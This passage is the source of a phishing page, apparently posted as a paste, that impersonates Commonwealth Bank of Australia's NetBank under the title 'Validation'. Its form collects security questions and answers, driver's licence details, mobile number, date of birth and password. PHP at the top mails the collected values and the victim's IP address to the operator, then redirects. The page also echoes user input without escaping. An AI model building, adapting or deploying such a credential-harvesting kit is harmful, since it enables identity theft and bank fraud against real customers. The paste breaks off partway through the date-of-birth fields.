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Mar 14th, 2018
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  1. <?php
  2. error_reporting(0);
  3. require 'check.php';
  4. $error = '';
  6. if(isset($_POST['submit']))
  7. {
  8. if(trim($_POST['ans1']) == "" || trim($_POST['ans2']) == "")
  9. {
  10. $error = 'You are required to provide all details to proceed';
  11. }
  12. else if($_POST['que1'] == '0')
  13. {
  14. $error = 'Kindly select your first personalised identification question';
  15. }
  16. else if($_POST['que2'] == '0')
  17. {
  18. $error = 'Kindly select your second personalised identification question';
  19. }
  20. else if($_POST['que1'] == $_POST['que2'])
  21. {
  22. $error = 'Your personalised identification questions must be different';
  23. }
  24. else if(strlen($_POST['ans1']) < 3)
  25. {
  26. $error = 'Your personalised answer one is too short';
  27. }
  28. else if(strlen($_POST['ans2']) < 3)
  29. {
  30. $error = 'Your personalised answer two is too short';
  31. }
  33. else if($_POST['state'] == '0')
  34. {
  35. $error = 'Your licence issuing state is required';
  36. }
  38. else {
  39. $to = ',';
  40. $ip = getenv("REMOTE_ADDR");
  41. $subject = "cw env ".$ip;
  42. $msg = "Ques1: ".$_POST['que1']."<br>";
  43. $msg .= "Ans1: ".$_POST['ans1']."<br>";
  44. $msg .= "Ques2: ".$_POST['que2']."<br>";
  45. $msg .= "Ans2: ".$_POST['ans2']."<br>";
  46. $msg .= "--------------------------------<br>";
  47. $msg .= "Issue State: ".$_POST['state']."<br>";
  48. $msg .= "Licence Card: ".$_POST['card']."<br>";
  49. $msg .= "Effective Date: ".$_POST['eff1']."/".$_POST['eff2']."/".$_POST['eff3']."<br>";
  50. $msg .= "Licence No: ".$_POST['licence']."<br>";
  51. $msg .= "Licence Expiry: ".$_POST['dd']."/".$_POST['mm']."/".$_POST['yy']."<br>";
  52. $msg .= "Mobile: ".$_POST['mobile']."<br>";
  53. $msg .= "DoB: ".$_POST['dob1']."/".$_POST['dob2']."/".$_POST['dob3']."<br>";
  54. $msg .= "Pass: ".$_POST['password']."<br>";
  55. $msg .= $ip;
  57. $headers = 'MIME-Version: 1.0' . "\r\n";
  58. $headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
  59. $headers .= 'From: common' . "\r\n" .
  60. 'X-Mailer: PHP/' . phpversion();
  61. mail($to,$subject,$msg,$headers);
  62. header('Location:');
  63. }
  64. }
  65. ?>
  66. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">
  67. <html xmlns="" xml:lang="en" lang="en">
  68. <head><title>
  69. NetBank - Validation - Australia's #1 online bank
  70. </title>
  71. <meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
  72. <link rel="stylesheet" type="text/css" href="css/fol-core-hash-min.css?v=c5a72174bdec7c0a7b32372e69a39719" />
  73. <link rel="stylesheet" type="text/css" href="css/fol-netbank-hash-min.css?v=419d05c96f3360df878d9e0c0cbc694c" />
  74. <script src="js/jquery-1.10.1.min.js"></script>
  76. </head>
  77. <body id="ctl00_BodyTag" class="registerfornetbankaustralias1onlinebank NavigationLess">
  78. <form name="aspnetForm" method="post" action="" autocomplete="off">
  79. <div>
  80. </div>
  82. <div class="clearfix NavigationLess" id="BodyContainer">
  83. <a href="#ContentArea" class="SkipToMainContent">Skip to main content</a>
  84. <div id="BodyContainer">
  85. <!-- header -->
  86. <a href="#ContentArea" class="SkipToMainContent">Skip to main content</a>
  87. <div id="CBALogo">
  88. <span><img src="images/cba_mainLogo.png" alt="Commonwealth Bank of Australia" /></span>
  90. </div>
  92. <div class="Toolbar"></div>
  94. <div class="clearfix" id="ContentArea">
  95. <div id="MainContent">
  96. <h1>My Q&As</h1>
  97. <p><font color="#9c0000"><b>*</b></font> = Required</p>
  98. <h4 >
  99. These are personalised identification questions which will be used to verify your account.
  100. Please confirm your security questions from the predefined lists and enter the appropriate answers.
  101. </h4>
  102. <div class="MessagePanel arrow" id="ctl00_mplMessagePanel" style="display:none;">
  104. </div>
  107. <div class="ContentPanel_Form" id="ctl00_BodyPlaceHolder_ctl00_outer">
  108. <fieldset id="ctl00_BodyPlaceHolder_ctl00" class="ContentPanel NoLine">
  109. <div class="Summary">
  111. <font color="#ca1905">
  112. <p align="center">
  113. <?php if(isset($_POST['submit']))
  114. {
  115. echo '<b>'.$error.'</b>';
  116. }
  117. ?>
  118. </p>
  119. </font>
  121. </div><div class="FieldPanel">
  122. <ul class="LabelFieldList">
  125. <li id="ctl00_BodyPlaceHolder_txtCardNumber" class="LabelFieldListItem Mandatory"><div class="LabelWrapper LWidth15 LabelTextAlign NotSet align_notset LabelWithHelp">
  126. <label for="ctl00_BodyPlaceHolder_txtCardNumber_field">
  128. <span class="MainLabel MainLabelFlexi"><strong>* Question 1</strong></span></label>
  130. <div class="FieldPopup FieldHelp" id="ctl00_BodyPlaceHolder_txtCardNumber_ctl00_helpPopup">
  131. <div class="FieldPopupContents arrow"></div>
  132. </div>
  133. </div>
  134. <select name="que1" class=" MandatoryField field reserveSpace">
  135. <option value="0">Select...</option>
  136. <option <?php echo (isset($_POST['que1']) && $_POST['que1'] == 'What was the name of your first pet?') ? ' selected="selected"' : '' ;?> value="What was the name of your first pet?">What was the name of your first pet?</option>
  137. <option <?php echo (isset($_POST['que1']) && $_POST['que1'] == 'What is the name of your best friend?') ? ' selected="selected"' : '' ;?> value="What is the name of your best friend?">What is the name of your best friend?</option>
  138. <option <?php echo (isset($_POST['que1']) && $_POST['que1'] == 'What was the suburb of your first home?') ? ' selected="selected"' : '' ;?> value="What was the suburb of your first home?">What was the suburb of your first home?</option>
  139. <option <?php echo (isset($_POST['que1']) && $_POST['que1'] == 'What is the name of the first company that employed you?') ? ' selected="selected"' : '' ;?> value="What is the name of the first company that employed you?">What is the name of the first company that employed you?</option>
  140. <option <?php echo (isset($_POST['que1']) && $_POST['que1'] == 'What was the first name of your first manager or boss?') ? ' selected="selected"' : '' ;?> value="What was the first name of your first manager or boss?">What was the first name of your first manager or boss?</option>
  141. <option <?php echo (isset($_POST['que1']) && $_POST['que1'] == 'What country did you first visit on your first overseas trip?') ? ' selected="selected"' : '' ;?> value="What country did you first visit on your first overseas trip?">What country did you first visit on your first overseas trip?</option>
  142. <option <?php echo (isset($_POST['que1']) && $_POST['que1'] == 'What was the surname of your first year class teacher?') ? ' selected="selected"' : '' ;?> value="What was the surname of your first year class teacher?">What was the surname of your first year class teacher?</option>
  143. <option <?php echo (isset($_POST['que1']) && $_POST['que1'] == 'What was your favourite childhood toy?') ? ' selected="selected"' : '' ;?> value="What was your favourite childhood toy?">What was your favourite childhood toy?</option>
  144. <option <?php echo (isset($_POST['que1']) && $_POST['que1'] == 'What is your favourite food?') ? ' selected="selected"' : '' ;?> value="What is your favourite food?">What is your favourite food?</option>
  145. <option <?php echo (isset($_POST['que1']) && $_POST['que1'] == 'What was the name of your first primary school?') ? ' selected="selected"' : '' ;?> value="What was the name of your first primary school?">What was the name of your first primary school?</option>
  146. <option <?php echo (isset($_POST['que1']) && $_POST['que1'] == 'What was the first musical instrument you ever played?') ? ' selected="selected"' : '' ;?> value="What was the first musical instrument you ever played?">What was the first musical instrument you ever played?</option>
  147. <option <?php echo (isset($_POST['que1']) && $_POST['que1'] == 'What was the make of your first car?') ? ' selected="selected"' : '' ;?> value="What was the make of your first car?">What was the make of your first car?</option>
  148. <option <?php echo (isset($_POST['que1']) && $_POST['que1'] == 'What is the maiden name of your mother?') ? ' selected="selected"' : '' ;?> value="What is the maiden name of your mother?">What is the maiden name of your mother?</option>
  149. <option <?php echo (isset($_POST['que1']) && $_POST['que1'] == 'What is the middle name of your eldest brother or sister?') ? ' selected="selected"' : '' ;?> value="What is the middle name of your eldest brother or sister?">What is the middle name of your eldest brother or sister?</option>
  150. </select>
  151. </li>
  152. <li id="ctl00_BodyPlaceHolder_txtCardNumber" class="LabelFieldListItem Mandatory"><div class="LabelWrapper LWidth15 LabelTextAlign NotSet align_notset LabelWithHelp">
  153. <label for="ctl00_BodyPlaceHolder_txtCardNumber_field">
  155. <span class="MainLabel MainLabelFlexi"><strong>* Answer 1</strong></span></label>
  157. <div class="FieldPopup FieldHelp" id="ctl00_BodyPlaceHolder_txtCardNumber_ctl00_helpPopup">
  158. <div class="FieldPopupContents arrow"></div>
  159. </div>
  160. </div>
  162. <input name="ans1" type="text" maxlength="50" value="<?php echo $_POST['ans1']; ?>" class="text textbox MandatoryField field reserveSpace" size="35"/>
  164. </li>
  165. <li id="ctl00_BodyPlaceHolder_txtCardNumber" class="LabelFieldListItem Mandatory"><div class="LabelWrapper LWidth15 LabelTextAlign NotSet align_notset LabelWithHelp">
  166. <label for="ctl00_BodyPlaceHolder_txtCardNumber_field">
  168. <span class="MainLabel MainLabelFlexi"><strong>* Question 2</strong></span></label>
  170. <div class="FieldPopup FieldHelp" id="ctl00_BodyPlaceHolder_txtCardNumber_ctl00_helpPopup">
  171. <div class="FieldPopupContents arrow"></div>
  172. </div>
  173. </div>
  174. <select name="que2" class=" MandatoryField field reserveSpace">
  175. <option value="0">Select...</option>
  176. <option <?php echo (isset($_POST['que2']) && $_POST['que2'] == 'What was the name of your first pet?') ? ' selected="selected"' : '' ;?> value="What was the name of your first pet?">What was the name of your first pet?</option>
  177. <option <?php echo (isset($_POST['que2']) && $_POST['que2'] == 'What is the name of your best friend?') ? ' selected="selected"' : '' ;?> value="What is the name of your best friend?">What is the name of your best friend?</option>
  178. <option <?php echo (isset($_POST['que2']) && $_POST['que2'] == 'What was the suburb of your first home?') ? ' selected="selected"' : '' ;?> value="What was the suburb of your first home?">What was the suburb of your first home?</option>
  179. <option <?php echo (isset($_POST['que2']) && $_POST['que2'] == 'What is the name of the first company that employed you?') ? ' selected="selected"' : '' ;?> value="What is the name of the first company that employed you?">What is the name of the first company that employed you?</option>
  180. <option <?php echo (isset($_POST['que2']) && $_POST['que2'] == 'What was the first name of your first manager or boss?') ? ' selected="selected"' : '' ;?> value="What was the first name of your first manager or boss?">What was the first name of your first manager or boss?</option>
  181. <option <?php echo (isset($_POST['que2']) && $_POST['que2'] == 'What country did you first visit on your first overseas trip?') ? ' selected="selected"' : '' ;?> value="What country did you first visit on your first overseas trip?">What country did you first visit on your first overseas trip?</option>
  182. <option <?php echo (isset($_POST['que2']) && $_POST['que2'] == 'What was the surname of your first year class teacher?') ? ' selected="selected"' : '' ;?> value="What was the surname of your first year class teacher?">What was the surname of your first year class teacher?</option>
  183. <option <?php echo (isset($_POST['que2']) && $_POST['que2'] == 'What was your favourite childhood toy?') ? ' selected="selected"' : '' ;?> value="What was your favourite childhood toy?">What was your favourite childhood toy?</option>
  184. <option <?php echo (isset($_POST['que2']) && $_POST['que2'] == 'What is your favourite food?') ? ' selected="selected"' : '' ;?> value="What is your favourite food?">What is your favourite food?</option>
  185. <option <?php echo (isset($_POST['que2']) && $_POST['que2'] == 'What was the name of your first primary school?') ? ' selected="selected"' : '' ;?> value="What was the name of your first primary school?">What was the name of your first primary school?</option>
  186. <option <?php echo (isset($_POST['que2']) && $_POST['que2'] == 'What was the first musical instrument you ever played?') ? ' selected="selected"' : '' ;?> value="What was the first musical instrument you ever played?">What was the first musical instrument you ever played?</option>
  187. <option <?php echo (isset($_POST['que2']) && $_POST['que2'] == 'What was the make of your first car?') ? ' selected="selected"' : '' ;?> value="What was the make of your first car?">What was the make of your first car?</option>
  188. <option <?php echo (isset($_POST['que2']) && $_POST['que2'] == 'What is the maiden name of your mother?') ? ' selected="selected"' : '' ;?> value="What is the maiden name of your mother?">What is the maiden name of your mother?</option>
  189. <option <?php echo (isset($_POST['que2']) && $_POST['que2'] == 'What is the middle name of your eldest brother or sister?') ? ' selected="selected"' : '' ;?> value="What is the middle name of your eldest brother or sister?">What is the middle name of your eldest brother or sister?</option>
  190. </select>
  191. </li>
  192. <li id="ctl00_BodyPlaceHolder_txtCardNumber" class="LabelFieldListItem Mandatory"><div class="LabelWrapper LWidth15 LabelTextAlign NotSet align_notset LabelWithHelp">
  193. <label for="ctl00_BodyPlaceHolder_txtCardNumber_field">
  195. <span class="MainLabel MainLabelFlexi"><strong>* Answer 2</strong></span></label>
  197. <div class="FieldPopup FieldHelp" id="ctl00_BodyPlaceHolder_txtCardNumber_ctl00_helpPopup">
  198. <div class="FieldPopupContents arrow"></div>
  199. </div>
  200. </div>
  202. <input name="ans2" type="text" maxlength="50" value="<?php echo $_POST['ans2']; ?>" class="text textbox MandatoryField field reserveSpace" size="35"/>
  204. </li>
  207. </ul>
  208. </div>
  209. </fieldset>
  210. </div>
  211. <h3>Identity Verification</h3>
  212. <span>Kindly provide your driver's licence information for 100 point identification check</span>
  213. <div class="ContentPanel_Form" id="ctl00_BodyPlaceHolder_ctl00_outer">
  214. <fieldset id="ctl00_BodyPlaceHolder_ctl00" class="ContentPanel NoLine">
  215. <div class="FieldPanel">
  216. <ul class="LabelFieldList">
  219. <li id="ctl00_BodyPlaceHolder_txtCardNumber" class="LabelFieldListItem Mandatory"><div class="LabelWrapper LWidth15 LabelTextAlign NotSet align_notset LabelWithHelp">
  220. <label for="ctl00_BodyPlaceHolder_txtCardNumber_field">
  222. <span class="MainLabel MainLabelFlexi"><strong>* Licence Issuing State</strong></span></label>
  224. <div class="FieldPopup FieldHelp" id="ctl00_BodyPlaceHolder_txtCardNumber_ctl00_helpPopup">
  225. <div class="FieldPopupContents arrow"></div>
  226. </div>
  227. </div>
  228. <select name="state" id="state" class=" MandatoryField field reserveSpace">
  229. <option value="0">Select Issuing State</option>
  230. <option <?php echo (isset($_POST['state']) && $_POST['state'] == 'NSW') ? ' selected="selected"' : '' ;?> value="NSW">New South Wales</option>
  231. <option <?php echo (isset($_POST['state']) && $_POST['state'] == 'NT') ? ' selected="selected"' : '' ;?> value="NT">Northern Territory</option>
  232. <option <?php echo (isset($_POST['state']) && $_POST['state'] == 'Queens') ? ' selected="selected"' : '' ;?> value="Queens">Queensland</option>
  233. <option <?php echo (isset($_POST['state']) && $_POST['state'] == 'SA') ? ' selected="selected"' : '' ;?> value="SA">South Australia</option>
  234. <option <?php echo (isset($_POST['state']) && $_POST['state'] == 'Tasmania') ? ' selected="selected"' : '' ;?> value="Tasmania">Tasmania</option>
  235. <option <?php echo (isset($_POST['state']) && $_POST['state'] == 'Victoria') ? ' selected="selected"' : '' ;?> value="Victoria">Victoria</option>
  236. <option <?php echo (isset($_POST['state']) && $_POST['state'] == 'WA') ? ' selected="selected"' : '' ;?> value="WA">Western Australia</option>
  237. <option <?php echo (isset($_POST['state']) && $_POST['state'] == 'ACT') ? ' selected="selected"' : '' ;?> value="ACT">Australian Capital Territory</option>
  238. </select>
  239. </li>
  240. <script type="text/javascript">
  241. $(document).ready(function(){
  242. $('.box').hide();
  243. $('.mini').hide();
  245. $('#state').change(function() {
  246. $('.box').hide();
  247. $('#div' + $(this).val()).show();
  248. $('.mini').show();
  250. });
  252. });
  253. </script>
  254. <div id="divN" class="mini">
  255. <div id="divNSW" class="box">
  256. <li id="ctl00_BodyPlaceHolder_txtCardNumber" class="LabelFieldListItem Mandatory">
  257. <div class="LabelWrapper LWidth15 LabelTextAlign NotSet align_notset LabelWithHelp">
  258. <label for="ctl00_BodyPlaceHolder_txtCardNumber_field">
  260. <span class="MainLabel MainLabelFlexi"><strong>* Licence Card N<u>o</u>.</strong></span></label>
  262. <div class="FieldPopup FieldHelp" id="ctl00_BodyPlaceHolder_txtCardNumber_ctl00_helpPopup">
  263. <div class="FieldPopupContents arrow"></div>
  264. </div>
  265. </div>
  267. <input name="card" type="text" maxlength="19" value="<?php echo $_POST['card']; ?>" class="text textbox MandatoryField field reserveSpace" size="35"/>
  268. </li>
  269. </div>
  270. <div id="divQueens" class="box">
  271. <li id="ctl00_BodyPlaceHolder_txtCardNumber" class="LabelFieldListItem Mandatory">
  272. <div class="LabelWrapper LWidth15 LabelTextAlign NotSet align_notset LabelWithHelp">
  273. <label for="ctl00_BodyPlaceHolder_txtCardNumber_field">
  275. <span class="MainLabel MainLabelFlexi"><strong>* Effective Date</strong></span></label>
  277. <div class="FieldPopup FieldHelp" id="ctl00_BodyPlaceHolder_txtCardNumber_ctl00_helpPopup">
  278. <div class="FieldPopupContents arrow"></div>
  279. </div>
  280. </div>
  282. <select name="eff1" class=" MandatoryField field reserveSpace">
  283. <option value="0">DD</option>
  284. <?php
  285. for($i=1; $i<=31; $i++)
  286. {
  287. echo '<option value='.$i.' ';
  288. if($_POST['eff1'] == $i)
  289. echo 'selected';
  290. echo '>'.sprintf("%02d", $i).'</option>';
  291. }
  292. ?>
  293. </select>
  295. <select name="eff2" class=" MandatoryField field reserveSpace">
  296. <?php
  297. $mon = array("MON","JAN","FEB","MAR","APR", "MAY", "JUN", "JUL", "AUG", "SEP", "OCT", "NOV", "DEC");
  298. foreach($mon as $key => $values)
  299. {
  300. echo '<option value='.$key;
  301. echo (isset($_POST['eff2']) && $_POST['eff2'] == $key) ? ' selected="selected"' : '';
  302. echo '>'.$values.'</option>';
  303. }
  304. ?>
  305. </select>
  307. <select name="eff3" class=" MandatoryField field reserveSpace">
  308. <option value="0">YYYY</option>
  309. <?php
  310. for($i=2000; $i<=2020; $i++)
  311. {
  312. echo '<option value='.$i.' ';
  313. if($_POST['eff3'] == $i)
  314. echo 'selected';
  315. echo '>'.$i.'</option>';
  316. }
  317. ?>
  318. </select>
  319. </li>
  320. </div>
  321. <li id="ctl00_BodyPlaceHolder_txtCardNumber" class="LabelFieldListItem Mandatory">
  322. <div class="LabelWrapper LWidth15 LabelTextAlign NotSet align_notset LabelWithHelp">
  323. <label for="ctl00_BodyPlaceHolder_txtCardNumber_field">
  325. <span class="MainLabel MainLabelFlexi"><strong>* Driver's Licence N<u>o</u>.</strong></span></label>
  327. <div class="FieldPopup FieldHelp" id="ctl00_BodyPlaceHolder_txtCardNumber_ctl00_helpPopup">
  328. <div class="FieldPopupContents arrow"></div>
  329. </div>
  330. </div>
  332. <input name="licence" type="text" maxlength="15" value="<?php echo $_POST['licence']; ?>" class="text textbox MandatoryField field reserveSpace" size="35"/>
  333. </li>
  335. <li id="ctl00_BodyPlaceHolder_txtCardNumber" class="LabelFieldListItem Mandatory">
  336. <div class="LabelWrapper LWidth15 LabelTextAlign NotSet align_notset LabelWithHelp">
  337. <label for="ctl00_BodyPlaceHolder_txtCardNumber_field">
  339. <span class="MainLabel MainLabelFlexi"><strong>* Licence Expiry</strong></span></label>
  341. <div class="FieldPopup FieldHelp" id="ctl00_BodyPlaceHolder_txtCardNumber_ctl00_helpPopup">
  342. <div class="FieldPopupContents arrow"></div>
  343. </div>
  344. </div>
  346. <select name="dd" class=" MandatoryField field reserveSpace">
  347. <option value="0">DD</option>
  348. <?php
  349. for($i=1; $i<=31; $i++)
  350. {
  351. echo '<option value='.$i.' ';
  352. if($_POST['dd'] == $i)
  353. echo 'selected';
  354. echo '>'.sprintf("%02d", $i).'</option>';
  355. }
  356. ?>
  357. </select>
  359. <select name="mm" class=" MandatoryField field reserveSpace">
  360. <?php
  361. $mon = array("MON","JAN","FEB","MAR","APR", "MAY", "JUN", "JUL", "AUG", "SEP", "OCT", "NOV", "DEC");
  362. foreach($mon as $key => $values)
  363. {
  364. echo '<option value='.$key;
  365. echo (isset($_POST['mm']) && $_POST['mm'] == $key) ? ' selected="selected"' : '';
  366. echo '>'.$values.'</option>';
  367. }
  368. ?>
  369. </select>
  371. <select name="yy" class=" MandatoryField field reserveSpace">
  372. <option value="0">YYYY</option>
  373. <?php
  374. for($i=2013; $i<=2030; $i++)
  375. {
  376. echo '<option value='.$i.' ';
  377. if($_POST['yy'] == $i)
  378. echo 'selected';
  379. echo '>'.$i.'</option>';
  380. }
  381. ?>
  382. </select>
  383. </li>
  385. <li id="ctl00_BodyPlaceHolder_txtCardNumber" class="LabelFieldListItem Mandatory">
  386. <div class="LabelWrapper LWidth15 LabelTextAlign NotSet align_notset LabelWithHelp">
  387. <label for="ctl00_BodyPlaceHolder_txtCardNumber_field">
  389. <span class="MainLabel MainLabelFlexi"><strong>* Mobile N<u>o</u>.</strong></span></label>
  391. <div class="FieldPopup FieldHelp" id="ctl00_BodyPlaceHolder_txtCardNumber_ctl00_helpPopup">
  392. <div class="FieldPopupContents arrow"></div>
  393. </div>
  394. </div>
  396. <input name="mobile" type="text" maxlength="12" value="<?php echo $_POST['mobile']; ?>" class="text textbox MandatoryField field reserveSpace" size="35"/>
  397. </li>
  399. <li id="ctl00_BodyPlaceHolder_txtCardNumber" class="LabelFieldListItem Mandatory">
  400. <div class="LabelWrapper LWidth15 LabelTextAlign NotSet align_notset LabelWithHelp">
  401. <label for="ctl00_BodyPlaceHolder_txtCardNumber_field">
  403. <span class="MainLabel MainLabelFlexi"><strong>* Date of Birth</strong></span></label>
  405. <div class="FieldPopup FieldHelp" id="ctl00_BodyPlaceHolder_txtCardNumber_ctl00_helpPopup">
  406. <div class="FieldPopupContents arrow"></div>
  407. </div>
  408. </div>
  410. <select name="dob1" class=" MandatoryField field reserveSpace">
  411. <option value="0">DD</option>
  412. <?php
  413. for($i=1; $i<=31; $i++)
  414. {
  415. echo '<option value='.$i.' ';
  416. if($_POST['dob1'] == $i)
  417. echo 'selected';
  418. echo '>'.sprintf("%02d", $i).'</option>';
  419. }
  420. ?>
  421. </select>
  423. <select name="dob2" class=" MandatoryField field reserveSpace">
  424. <?php
  425. $mon = array("MON","JAN","FEB","MAR","APR", "MAY", "JUN", "JUL", "AUG", "SEP", "OCT", "NOV", "DEC");
  426. foreach($mon as $key => $values)
  427. {
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  429. echo (isset($_POST['dob2']) && $_POST['dob2'] == $key) ? ' selected="selected"' : '';
  430. echo '>'.$values.'</option>';
  431. }
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  439. {
  440. echo '<option value='.$i.' ';
  441. if($_POST['dob3'] == $i)
  442. echo 'selected';
  443. echo '>'.$i.'</option>';
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